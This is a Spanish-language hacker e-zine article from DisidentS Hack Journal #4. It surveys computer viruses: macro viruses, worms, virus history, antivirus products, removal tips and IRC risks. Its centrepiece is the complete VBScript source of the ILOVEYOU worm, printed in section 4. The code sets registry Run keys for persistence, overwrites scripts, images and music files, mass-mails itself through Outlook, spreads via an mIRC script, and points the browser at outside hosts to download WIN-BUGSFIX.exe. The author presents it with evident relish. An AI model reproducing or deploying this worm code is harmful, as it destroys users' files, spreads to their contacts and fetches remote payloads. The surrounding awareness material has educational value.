
                    
                     -+-| DisidentS Hack Journal #4 |-+-





 ____________________________________________________________________________
 |                                                                           |
 | -- Titulo_____: Estudio de los Virus Informáticos                         |
 | -- Autor______: VeNt0r                                                    |
 | -- E-Mail_____: VeNt0r@Hotmail.com                                        |
 | -- Team_______: Disidents España - http://www.disidents.org               |
 | -- Tema_______: Todo acerca de los Virus Informáticos                     |
 |___________________________________________________________________________|
 
.==============================================================================.
|===========~ INDICE ~==========================================================
|===============================================================================
|=~ 1.0 INTRODUCCIÓN                                                           |   
|=~ 2.0 MACRO VIRUS                                                            |
|=~ 3.0 "GUSANOS INFORMáTICOS"                                                 |
|=~ 4.0 LOVE-LETTER-FOR-YOU                                                    |
|=~ 5.0 "HISTORIA" DE LOS VIRUS INFORMáTICOS                                   |
|=~ 6.0 ANTIVIRUS                                                              |
|=~ 6.1 LISTADO                                                                |
|=~ 6.2 DEBILIDADES                                                            |
|=~ 6.3 HERRAMIENTAS DE SUSTITUCIóN                                            |
|=~ 7.0 BOMBAS LÓGICAS                                                         |
|=~ 8.0 COMO ELIMINAR UN VIRUS                                                 |
|=~ 9.0 VIRUS EN EL IRC (INTERNET RELAY CHAT)                                  |
|=~ 10.0 LISTA DE WEB'S DONDE PODREIS ENCONTRAR MÁS INFORMACIÓN                |
|=~ 11.0 DESPEDIDA                                                             |
|=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=.
======================================================~ INDICE ~================
================================================================================
 
             
.==============================================================================.
|=======~ 1.0 INTRODUCCION     ~================================================
|===============================================================================
 
Bueno, este texto se ha realizado  con la intención  de  que quien no sepa mucho
acerca   de  un virus  informático,se  informe... ( fundamentos... ect, ect... )
Bien, antes  de   empezar, muchos  de  ustedes  quizás  se   esten  preguntando: 
<<¿Que es un "Virus Informático"?>>
Pues la respuesta es  más  bien sencilla, un Virus Informático  es   un  archivo 
Ejecutable ( logicamente   compilado ... ... ) codeado por un   programador  con
intenciones maliciosas,en cualquier  lenguaje de programación y que  es capaz de 
realizar operaciones  en   un  sistema sin el concentimiento  de  su  root/admin 
Existen varios tipos  de virus informáticos pero la mayoría suelen  realizar una
Función que es la siguiente:

1º- Buscan un archivo.
2º- Ver si esta infectado.
3º- Si no esta infectado, lo infecta .. .. logicamente .. ..
4º- Si esta infectado, busca el archivo  mas  cercano (del mismo formato)  y  lo
    infecta....

Aunque ese no es el  único tipo de  virus informatico,pero digamos que es el mas
común, el que más se da ...

A  continuación   nombraré  las  características  mas   comunes  de  los   virus 
informáticos

*Instalarse  en  la  memoria  del sistema, desde alli podrá  infectar  cualquier
 acción que el root/administrador realice en ese momento.
*Saben ocultarse bastante bien,modificando la información para que el  antivirus
 (por ejemplo) no lo detecte.Además,el virus puede mantener su código encriptado
 hasta ser ejecutado lo que impediría ser detectado.
*No son reinsidentes, es decir, no se cargan en la memoria. Aunque  por  algunos
 métodos  proporcionados  por MS-DOS como  MCB (Memory Control Block)  se pueden 
 dejar residentes en el sistema.
*Algunos se  ejecutan en momentos determinado. Por  ejemplo, determinados  virus
 informáticos  se  ejecutan en una fecha determinada (Como por ejemplo por citar 
 asi alguno...el W97M/Thursday)...

Prefijos que se le asigan a los Virus informáticos:

-A97M: Asignados  para  los  Macro Virus (Microsoft Access 97,  ya  veremos  mas
 adelante que es un "Macro Virus")
-Backdoor: Como su propio nombre índica, se  le asigna a  los virus informáticos
 que crean una "Puerta Trasera" en el sistema.
-O97M: Macro Virus (Esta vez para Microsoft Office 97).
-PalmOS: Virus logicamente con sistema operativo PalmOS.
-PHP: Utiliza rutinas de este lenguaje.
-Trojan: Troyanos .....
-VBS: Virus Informático realizado en Visual Basic Script.
-W2K: Daña archivo de booteo y sólo funciona en Windows 2000.
-W32: Igual que el W2k pero esta vez funciona en cualquier ambiente  de  Windows
 32.
-W95: Daña archivos de booteo bajo Windows 95.
-W97M: Macro Virus que sólo afecta a Word 97.
-WM: Macro Virus para Microsoft Word 95.
-WNT: Infecta al booteo y sólo funciona en Windows NT.
-Worm: (Estos  son  mis  preferidos) Estos virus  se  dedican  principalmente  a          
 reproducirse.
-X97M y X97M: Sólo afectan a a Excel 97
-XF y XM: Marcro Virus. Sólo afectan a Excel 95

NOTA: Los troyanos  (Back Orificce, NetBus, TALADRATOR    www.taladrator.tk  :D)
para mi no es un virus informático,porque no tiene las caracteristicas que tiene 
un Virus, por ejemplo,  el  troyano  no  se reproduce...  aparte de otras muchas
razones ...


.==============================================================================.
|=======~ 2.0 MACRO VIRUS     ~=================================================
|===============================================================================

Los Macro Virus son practicamente  virus que se difuminan muy rapidamente  y que
afectan principalmente a softwares de sistemas con entornos Windows (Word,Excel, 
Access,PowerPoint ...ect, ect ...)

La mayoría de las veces son pequeñas  aplicaciones en Visual Basic y estos tipos
de virus informáticos pueden hacer muchas cosas, aunque  la verdad es que no son
 muy peligrosos, hacen  desde reenviarse  por correo electrónico (W97M/Melissa), 
cada cierta fecha en uno de los programas  nombrados anteriormente ejecutar algo
 ( como es el ejemplo de W97/Intruded que en cierta fecha te borra documentos en 
Word) e incluso es capaz de conectarse  a cualquier  servidor FTP por ejemplo  y
 descargarse de el y subir a el cualquier tipo de cosa(Por ejem.  W97M/Claigula) 

ANALIZANDO ALGUNOS MACRO VIRUS:
-------------------------------

* WXP/Kallisti
Este es un virus de gravedad baja, de origen desconocido  y  es  el primer virus
Informático que afecta sólo al Microsoft Word de Office XP,sin rutinas para nada
maliciosa.Este virus informático puede reproducir sonidos siempre que el cliente 
instalado  coincida con  la  tarjeta  de sonido, imaginemos que este virus me ha 
infectado, me reproduciría lo siguiente:

"¡Hello, VeNt0r!"
"I said: !Hello VeNt0r!"
... LOL ...

*W97M/Intruded
Este es un virus de gravedad baja, de  origen desconocido  (como casi todos)  y
afecta a la plantilla principal de sistema NORMAL.DOT

*W97M/Digma
Este virus es de gravedad baja, de origen desconocido y mi macro virus preferido
:D.Este macro virus que aparte de infectar a archivos Word cambia las letras a y
 o de los documentos word que hagas el día 13 por la palabra ¨FUCK¨ (jodete) ...


.==============================================================================. 
|=======~ 3.0 GUSANOS   ~=======================================================
|===============================================================================


Estos tipos de Virus Informáticos se programan la mayoría de las veces en Visual
Basic Script y entre sus funciones principales estan:
- Reproducirse en el envio de e-mail por correo electrónico y en el IRC.
- Afectar sobreescribiendo (Por ejemplo) a archivos de cualquier tipo (.mp3,.doc      
  .avi ...ect, ect ...)
- Hacer mucho daño a un sistema.
- Tienen rutinas muy peligrosas.

ANALIZANDO ALGÚN "GUSANO INFORMáTICO" DE LA RED:
----------------------------------------------------

* LOVE-LETTER (Ya lo veremos mas adelante ... )

NOTA: No analizaré  gusanos informáticos  por  que practicamente  todos realizan
la misma función y son de gravedad baja la mayoría, media, e incluso algunos que
pueden llegar a ser muy peligrosos ...

.==============================================================================.                     
|=======~ 4.0 LOVE LETTER LETTER   ~============================================
|===============================================================================

Bien,  he decidido dedicarle un espacio a  este virus: LOVE-LETTER-FOR-YOU o mas
conocido como "I Love You". Este virus informático tiene mas de 30 variantes que
poco a poco irán creciendo por la facilidad que tiene el formato de este tipo de
virus y creo que se la dado mas importancia de la que se le debería de haber da-
do. El virus da referencia en su código a que proviene de "Manilla" ( Capital de 
Filipinas) y normalmente nos suele  llegar mediante un correo electrónico y des-
pués se envia el virus automaticamente sin que el "remitente" se entere ....

SUS FUNDAMENTOS SON LOS SIGUIENTES:

Ok, el virus llega  adjunto a un e-mail  que llega a  nuestra  cuenta  de correo
Electrónico (LOVE-LETTER-FOR-YOU.TXT) al  principio como  formato de texto, pero 
si tenemos instalado WSH (Windows Scripting Host) entonces el virus se ejecutará 
en nuestros sistema como un archivo de Visual Basic Script (VBS) infectando  asi 
nuestro sistema.A continuación, les mostraré el código  de este "polémico" virus 
informático, Fijense bienen su código:

--------------------------------------------------------------------------------
rem  barok -loveletter(vbe) <i hate go to school>
rem  by: spyder  /  ispyder@mail.com  /  @GRAMMERSoft Group  / Manila,Philippines

On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll

main()

sub main()

  On Error Resume Next
  dim wscr,rr
  set wscr=CreateObject("WScript.Shell")
  rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
  Host\Settings\Timeout")

  if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
    Host\Settings\Timeout",0,"REG_DWORD"
  end if

  Set dirwin = fso.GetSpecialFolder(0)
  Set dirsystem = fso.GetSpecialFolder(1)
  Set dirtemp = fso.GetSpecialFolder(2)
  Set c = fso.GetFile(WScript.ScriptFullName)
  c.Copy(dirsystem&"\MSKernel32.vbs")
  c.Copy(dirwin&"\Win32DLL.vbs")
  c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
  regruns()
  html()
  spreadtoemail()
  listadriv()

end sub

sub regruns()

  On Error Resume Next
  Dim num,downread
  regcreate
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
  regcreate
  "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
  downread=""
  downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download
  Directory")

  if (downread="") then
     downread="c:\"
  end if

  if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
     Randomize
     num = Int((4 * Rnd) + 1)
     if num = 1 then
       regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
       Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
     elseif num = 2 then
       regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
       Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
     elseif num = 3 then
       regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
       Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
     elseif num = 4 then
       regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
       Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
     end if
  end if

  if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
     regcreate
     "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
     regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
     Page","about:blank"
  end if

end sub

sub listadriv

  On Error Resume Next
  Dim d,dc,s
  Set dc = fso.Drives
  For Each d in dc
     If d.DriveType = 2 or d.DriveType=3 Then
        folderlist(d.path&"\")
     end if
  Next

  listadriv = s

end sub

sub infectfiles(folderspec)  

  On Error Resume Next
  dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
  set f = fso.GetFolder(folderspec)
  set fc = f.Files
  for each f1 in fc
  ext=fso.GetExtensionName(f1.path)
  ext=lcase(ext)
  s=lcase(f1.name)
  
  if (ext="vbs") or (ext="vbe") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
  elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or
    (ext="hta") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    bname=fso.GetBaseName(f1.path)
    set cop=fso.GetFile(f1.path)
    cop.copy(folderspec&"\"&bname&".vbs")
    fso.DeleteFile(f1.path)
  elseif(ext="jpg") or (ext="jpeg") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    set cop=fso.GetFile(f1.path)
    cop.copy(f1.path&".vbs")
    fso.DeleteFile(f1.path)
  elseif(ext="mp3") or (ext="mp2") then
    set mp3=fso.CreateTextFile(f1.path&".vbs")
    mp3.write vbscopy
    mp3.close
    set att=fso.GetFile(f1.path)
    att.attributes=att.attributes+2
  end if

  if (eq<>folderspec) then
    if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini")
    or (s="mirc.hlp") then
      set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
      scriptini.WriteLine "[script]"
      scriptini.WriteLine ";mIRC Script"
      scriptini.WriteLine ";, Please dont edit this script...mIRC will corrupt if mIRC will"
      scriptini.WriteLine "     corrupt... WINDOWS will affect and will not run
      correctly. thanks"
      scriptini.WriteLine ";"
      scriptini.WriteLine ";Khaled Mardam-Bey"
      scriptini.WriteLine ";http://www.mirc.com" 
      scriptini.WriteLine ";"
      scriptini.WriteLine "n0=on 1:JOIN:#:{"
      scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }"
      scriptini.WriteLine "n2= /.dcc send $nick"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
      scriptini.WriteLine "n3=}"
      scriptini.close
      eq=folderspec
    end if
  end if
  
  next  

end sub

sub folderlist(folderspec)  
  On Error Resume Next
  dim f,f1,sf
  set f = fso.GetFolder(folderspec)  
  set sf = f.SubFolders
  
  for each f1 in sf
    infectfiles(f1.path)
    folderlist(f1.path)
  next  

end sub

sub regcreate(regkey,regvalue)

  Set regedit = CreateObject("WScript.Shell")
  regedit.RegWrite regkey,regvalue

end sub

function regget(value)

  Set regedit = CreateObject("WScript.Shell")
  regget=regedit.RegRead(value)

end function

function fileexist(filespec)
  On Error Resume Next
  dim msg
  
  if (fso.FileExists(filespec)) Then
    msg = 0
  else
    msg = 1
  end if
  fileexist = msg

end function

function folderexist(folderspec)
  On Error Resume Next
  dim msg
  
  if (fso.GetFolderExists(folderspec)) then
    msg = 0
  else
    msg = 1
  end if

  fileexist = msg

end function

sub spreadtoemail()

  On Error Resume Next
  dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
  set regedit=CreateObject("WScript.Shell")
  set out=WScript.CreateObject("Outlook.Application")
  set mapi=out.GetNameSpace("MAPI")
  
  for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
  
    if (regv="") then
      regv=1
    end if

    if (int(a.AddressEntries.Count)>int(regv)) then
        for ctrentries=1 to a.AddressEntries.Count
          malead=a.AddressEntries(x)
          regad=""
          regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
 
          if (regad="") then
             set male=out.CreateItem(0)
             male.Recipients.Add(malead)
             male.Subject = "ILOVEYOU"
             male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
             male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
             male.Send
             regedit.RegWrite
             "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
          end if
         
          x=x+1
       
        next
        
        regedit.RegWrite
        "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
    else
        regedit.RegWrite
        "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
    end if

    next
   
    Set out=Nothing
    Set mapi=Nothing
  
end sub

sub html
  
  On Error Resume Next
  dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
  dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@
  CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
  "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @GRAMMERSoft
  Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
  "<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
  good...@-@>"&vbcrlf& _
  "<?-?HEAD><BODY
  ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
  "&vbcrlf& _
  "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
  BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
  "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this
  HTML file<BR>- Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
  "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
  BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
  "&vbcrlf& _
  "<?-?BODY><?-?HTML>"&vbcrlf& _
  "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
  "<!--?-??-?"&vbcrlf& _
  "if (window.screen){var wi=screen.availWidth;var
  hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _
  "?-??-?-->"&vbcrlf& _
  "<?-?SCRIPT>"&vbcrlf& _
  "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
  "<!--"&vbcrlf& _
  "on error resume next"&vbcrlf& _
  "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
  "aw=1"&vbcrlf& _
  "code="
  dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
  "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
  "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
  "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
  "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
  "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
  "wri.write code4"&vbcrlf& _
  "wri.close"&vbcrlf& _
  "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
  "if (err.number=424) then"&vbcrlf& _
  "aw=0"&vbcrlf& _
  "end if"&vbcrlf& _
  "if (aw=1) then"&vbcrlf& _
  "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
  "window.close"&vbcrlf& _
  "end if"&vbcrlf& _
  "end if"&vbcrlf& _
  "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
  "regedit.RegWrite
  @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf&
  _
  "?-??-?-->"&vbcrlf& _
  "<?-?SCRIPT>"
  dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
  dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
  dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
  dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
  dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
  dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
  dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
  dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
  set fso=CreateObject("Scripting.FileSystemObject")
  set c=fso.OpenTextFile(WScript.ScriptFullName,1)
  lines=Split(c.ReadAll,vbcrlf)
  l1=ubound(lines)
  for n=0 to ubound(lines)
  lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
  lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
  lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
 
  if (l1=n) then 
    lines(n)=chr(34)+lines(n)+chr(34)
  else
    lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
  end if

  next
  
  set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
  b.close
  set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
  d.write dt5
  d.write join(lines,vbcrlf)
  d.write vbcrlf
  d.write dt6
  d.close

end sub

--------------------------------------------------------------------------------
Pregunta al aire: Viendeo el código del virus creeis que el virus instala solo o
puede instalar solo el WSH (Windows Scripting Host)? muaaaahahahahahahaha

En esta web podreis ver las fotos de los autores de este virus:
http://www.wbglinks.net/pages/watchmen/pictures/pics02/lovevirus1.jpg


.==============================================================================.                     
|=======~ 5.0 ¨HISTORIA¨ DE LOS VIRUS   ~=======================================
|===============================================================================

Los virus informáticos han  ido  evolucionando  conforme  ha  pasado  el  tiempo
(logicamente ...) Surgieron a partir de CoreWar, un tipo de lenguaje ensamblador
que se dedicaba  a  comerse otros  programitas  y  reproducirse. Entonces  otros 
cientificos  del mit hicieron otro programa ANTI-ese primer "virus" que se comia 
a ese virus y asi se siguieron creando Estrategias para Comer programas,copiarse  
e infectar y hasta mutarse ... (Todo esto mas o menos sucedio sobre el año 1965) 
Hasta practicamente el día de hoy,que vemos virus informáticos tan bien codeados 
como Klez.l (Mejor  Virus Informático  en  persistencia  según  Panda  Software) 
Opaser.L (Mejor Virus Informático dañino según Panda Software), ect.

.==============================================================================.                     
|=======~ 6.0 ANTIVIRUS   ~=====================================================
|===============================================================================


Bien, en esta sección analizaremos Antivirus Informáticos, y daremos las opinio-
nes que han dado muchos expertos en el tema que no pertenecen  a ninguna empresa
de Antivirus Informático ni nada (Son "personales docente") como: ICSA.net,Virus
Bulletin, West Coast Lebs, HackFix,y la más importante de toda Virus Test Center 
de la Universidad de Hamburgo. Los fundamentos de los Antivirus Informáticos son
principalmente ver  que archivo tiene un código  malicioso mediante métodos como 
comprobar los códigos de éstos, busqueda por algoritmos, etc. 
A continuación, expondré  una lista con  los mejores Antivirus Informáticos A MI 
PARECER, fijate bien:

Antivirus                                 SO 
---------                                 --
Panda Antivirus (Platinun)                Win3.x/95/98/2000/NT/ME/XP
McAfee                                    MS-DOS/Win95/98/2000/NT/ME/XP
NOrton Antivirus                          MS-DOS/Win3.x/95/98/2000/NT/XP
ToolKit Pro                               MS-DOS/95/98/NT
FileScan (Freeware)                       Linux     |
NOrton Antivirus                          Macintosh |
Claro que estons Antivirus tendrían que ser todos más  o  menos  iguales  si  se
actualizan)

-Puntos de referencia:
http://www.hispasec.com/
http://www.icsa.net
http://www.virusbtn.com/
http://www.check-mark.com/
http://www.hackfix.org/ 
http://www.antivirus.about.com/
http://www.wildlist.org/
httP://www.uta.fi/laitokset/virus

A conticuación mostraré un listado de Antivirus Informáticos clasificados por el
Sistema Operativo (SO ...) para el que es.

.==============================================================================.                     
|=======~ 6.1 LISTADO   ~=======================================================
|===============================================================================

Bien empezamos por los Antivirus Informático de los Sistemas Windows. 
 
Antivirus:
----------
Anti Vir Personal Edition (FreeWare)
Kaspersky Antivirus 
AVG (Freeware)
AVAST32
Command Antivirus 
Virus T@B
Dr. Salomon's Antivirus Toolkit
E-Safe Protect Desktop (Freeware)
F-Secure
Inoculate IT
IRIS Antivirus 
McFee
NOD32
Norman Virus Control
Norton Antivirus
Office Scan
Panda Antivirus
Pc-Cillin
Protector Plus
QuickHeal
Sophos Antivirus
Thunderbyte Antivirus
(...)

Para  Linux  no  uso  ni  conozco ningún Antivirus, pero considero que para este
Sistema Opertavo el mejor Antivirus tiene que ser el sentido común y además como
la mayoría de los codeadores que hacen Virus informáticos lo hacen para sistemas 
en entornos Windows (Es el SO que más se utiliza a nivel mundial) no tendrás que 
preocuparte mucho de Virus Informático si usas Linux, aunque mira  en esta URL y
 no me llores http://clamav.elektrapro.com/.

Pasamos palabra y nos toca Antivirus informáticos para Macintosh.

Antivirus:
----------
Disinfectant
IRIS Antivirus
Norton Antivirus
Sophos Antivirus
Vaccine 
Virex
(Todos Shareware)

.==============================================================================.                     
|=======~ 6.2 HERRAMIENTAS DE SUSTITUCION   ~===================================
|===============================================================================

Ok, a  conticuación  mostraré una serie de útilies muy buenos para ciertos virus
Informáticos (Algunos antiguos y otros nuevo)

vIRUS:                           HERRAMIENTA:
------                           ------------
*O97M/Tristate .A                Rmv. Tris
*Back Oriffice (Troyano)         -BO Detect (En su última versión)
                                 -NOBO
*NetBus                          -NetBus Remover
                                 -NetBus Detective (En su éltima edición)
                                 -Cleaner
*VBS/KakWorm                     AntiKak
*VBS/LoveLetter                  I Love You Cleaner
*VBS/Stages                      -FixLife
                                 -KillStag
*W32/ExplorerZip                 KilleZip
*W32/FunLove                     Fix Funlove
*w32/Navidad                     Navidad Fixer Tool
*w32/Ska                         Rmv-SKA
*w97M/Class                      Rmv-CLASS
*Worm.Hybris                     FIX-HYBRISF
*Worm.Irok                       Irok Killer
*Worm.MTX                        FIX-MTX
*Worm.NewApt                     NewApt Cleaner
*Worm.PrettyPark                 PrettyPark Cleaner

(Todos estos útiles lo podreis encontrar en la red: www.google.com, ect. Después
tengo en mi servidor dos útiles bastante buenos que vi en una revista que merece  
la pena que se bajeis  que son: clrav y f-bugbr que actúan  contra  una serie de 
virus informáticos determinados nuevos.
La dirección de mi servidor es: http://usuarios.lycos.es/vent0r/)

.==============================================================================.                     
|=======~ 7.0 BOMBAS LOGICAS   ~================================================
|===============================================================================

Las Bombas Lógicas es como un virus Informático que por ejemplo  se  ejecuta  un
día determinado o cuando  realizas  una  acción  determinada  en  tu  sistema. A
diferencia del virus este no se duplica.Insisto, no son Virus Informáticos y uno
de los ejemplos que podría poner de Bomba Lógica es el W97M/Thursday ya nombrado 
con anterioridad.

.==============================================================================.                     
|=======~ 8.0 ELIMINANDO VIRUS INFORMATICOS   ~=================================
|===============================================================================

En este apartado te daré consejillos para eliminar Virus Informáticosmanualmente
(Sin herramientas ni nada ...) La mayoría de los Virus Informáticos se localizan 
en  la  dirección C:\ o  Regedit  (Editor de Registro)  de  todos  los  sistemas  
(Eliminalos ... ...)
*Para eliminar Macro Virus (Por Ejemplo) lo que tienes  que hacer  es activar un
protección que  tienen todos  los Words y  abrir el archivo infectado SIN MACROS 
para que así el propio software lo detecte y pase a eliminarlo
*Para elinminar un virus en el directorio _Restore de WindowsME  (Suele  ser muy
frecuente)Simplemente tendrás que irte al panel de control(sistema)y desabilitar 
la restauración del sistema presionando su checkbox ...después reinicia Y LISTO!

.==============================================================================.                     
|=======~ 9.0 VIRUS EN EL IRC     ~============================================= 
|===============================================================================

El IRC es  uno  de los  medios  que en  los días de hoy se  utiliza más  para la 
tranferencia de archivos e  información, por  eso considero que es  un medio muy 
peligroso en el que  tenemos  que tener  cuidado con los  Virus informático. Los
virus informáticos  que "circulan" por  la red  aprovechan las oportunidades del 
lenguaje de Scripting  (Por mIRC y Pirch por ejemplo) para  hacer cosas malicio-
sas (Entre ellas para mi la más peligrosa es el  temido auto-DCC-get, intenta no
activarlo demasiado.) también es capaz de  redireccionar los mensajes que mandan 
los usuarios conectados al chat (Nombre vulgar), cuando una una  persona realiza
 un comando determinada sacarte del IRC, hacer f-serve con  una persona (/fserve 
<nickname> <maxgets>  <homedirectory>  [welcomefile])  traduciendo  -=>  /fserve 
nick-tio cuantos-envios-simultaneos  c:  un-txt-de-bienvenida) y  permitirle  el 
acceso 100% de otra persona a su disco  duro, enviarse  de  forma  muy rápida  a 
otros usuarios lo que es bastante peligroso por que esto  colaboraría en la pro-
pagación del virus (Imaginaros la mala combinación que hace el último fundamento
que he dicho con el auto-DCC-get) En verdad no se pueden considerar Virus infor-
máticos porque no se replica  de forma automática, pero  tened mucho cuidado ;).


.==============================================================================.                     
|=======~ 10 LINK’S     ~=======================================================
|===============================================================================

Ok, aqui podreis encontrar información más detallada de los temas que he tratado
en este texto algunas ya recogidas en el susodicho texto:

Fuentes:
--------
(La primera de todas que quero exponer es http://www.alerta-antivirus.es/ que es
una página que suelo frecuentar mucho,en ella podreis encontrar una lista de los
últimos virus encontrados por la  red, una  lista  de  los virus más expandidos, 
listas de las últimas vulnerabilidades encontradas, ect.)

http://www.kumite.com/mythx/
http://ciac.llnl.gov/ciac/CIAChoaxes.htm/
www.iec.csic.es/criptonomicon/articulos/expertos35.html/
www.iec.csic.es/criptonomicon/susurros/susurros09.html/
www.iec.csic.es/criptonomicon/cortafuegos/cortafuegoslinux.html/
http://www.kriptopolis.com/
http://www.cnn.com/
www.virusattack.com/
htt://ww.zonelabs.com/
http://www.nai.com/
http://www.pandasoftware.com/
http://www.commandcom.com/
http://www.avp-es.com
http://www.videosift.net.uy
http://www.whitehats.com
(En esta última página informaión completa sobre el Ramen, unos de los  primeros
Virus Informáticos que apareció en Linux, es algo antiguo.)

.==============================================================================.                     
|=======~ 11 DESPEDIDA     ~====================================================
|===============================================================================

Bien, todo lo bueno se acaba (Como este texto). Sólo deciros que espero que  por
lo menos sepan un poco más acerca de Virus Informáticos  y  también deciros  que
Windows  no  es  sólo  Windows  el  único  SO  (Sistema  operativo)  que   tiene 
vulnerabilidades con los Virus  Informáticos  (Para nada)  sistemas  con  Linux,
Macintosh e  incluso ya los PDA tienen Virus  informáticos (Lo próximo serán las 
lavadoras?¿?¿?¿) ... ..., lo  que  pasa  es  que  Windows  es  el  que más tiene
(logicamente), por que es el que más gente lo utiliza. Y recordad una cosa, pasé 
